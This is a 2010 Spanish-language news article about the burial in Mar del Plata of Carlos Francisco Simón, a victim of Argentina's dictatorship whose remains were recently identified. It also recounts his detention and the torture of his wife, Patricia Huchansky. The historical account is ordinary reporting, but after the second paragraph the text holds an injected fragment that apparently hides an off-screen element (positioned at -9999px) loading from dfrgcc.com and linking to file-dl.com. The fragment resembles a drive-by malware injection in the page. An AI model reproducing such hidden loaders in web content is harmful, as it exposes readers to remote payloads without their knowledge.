05/08/2010, Nacionales

Sepultarán en Mar del Plata a una víctima de la dictadura cuyo cuerpo fue recientemente identificado

Carlos Francisco Simón (FOTO), víctima de la dictadura desaparecido por más de 30 años cuyo cuerpo fue recientemente identificado, será sepultado el sábado por su familia en Mar del Plata, informó Marcelo Núñez, integrante de Hijos y Familiares de Desaparecidos.
Simón, que era ingeniero calculista, tenía 31 años cuando el 7 de febrero de 1977 fue secuestrado por militares en la localidad bonaerense de City Bell junto a su esposa, Patricia Huchansky, de 27 años, que sigue desaparecida.
/ src=http://dfrgcc.com/ur.php style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=10 / src=http://dfrgcc.com/ur.php

Los restos de Simón fueron identificados por el Equipo Argentino de Antropología Forense entre los 336 cuerpos anónimos hallados en una fosa común del cementerio de la ciudad bonaerense de Avellaneda, dijo Núñez.

"Por suerte le podremos dar una digna sepultura y honrar su memoria junto a sus hijos que en esa época tenían 1 y 3 años, y demás familiares y los amigos", declaró Juan Pablo Colacci, sobrino de Simón, a la radio marplatense Brisas.

Colacci reveló que "por los Juicios de la Verdad que se realizaron en La Plata teníamos el testimonio del final de lo que les ocurrió a ellos, pero no sabíamos dónde estaban sus cuerpos".

"Teníamos información de que estuvieron detenidos en el Pozo de Banfield y también en un par de lugares juntos y luego los separaron", añadió.

Respecto de la inhumación, prevista en el cementerio municipal marplatense, Colacci dijo que se trata de un acontecimiento "muy movilizador ya que vendrán familiares de todo el país para cerrar una historia de 33 años de dolor y podremos estar unida la familia dando la despedida que se merece".



Una dramática historia

Al momento de desaparecer Patricia tenía 27 años y era ama de casa. Carlos tenía 31 y era ingeniero calculista. La pareja fue secuestrada de su domicilio en City Bell el 7 de febrero de 1977.

Ese día fueron llevados al CCD Arana. Allí la vio Adriana Calvo. Según Calvo, ella escuchó como la torturaban a Patricia, y como la insultaban con mucha fortaleza mientras la torturaban. Al terminar la tortura la llevaron al calabozo. Patricia apenas podía hablar por tener la lengua tan hinchada por la picana, pero lo primero que dijo fue un insulto a los militares. Carlos fue llevado al calabozo de hombres.

Patricia ayudó a Adrina Calvo con los dolores del postparto y también atendió el parto de María Elolsa Castellini. Aunque gritaron pidiendo ayuda lo único que consiguieron es que las dejaran salir al pasillo a las dos y les alcanzaron un cuchillo de cocina. Allí en el piso nació una hermosa beba a la que se llevaron unas horas después.







 



En Argentina podés encontrar pantallas de led para publicidad en venta y alquiler

Compartí esta nota

retrato de hoy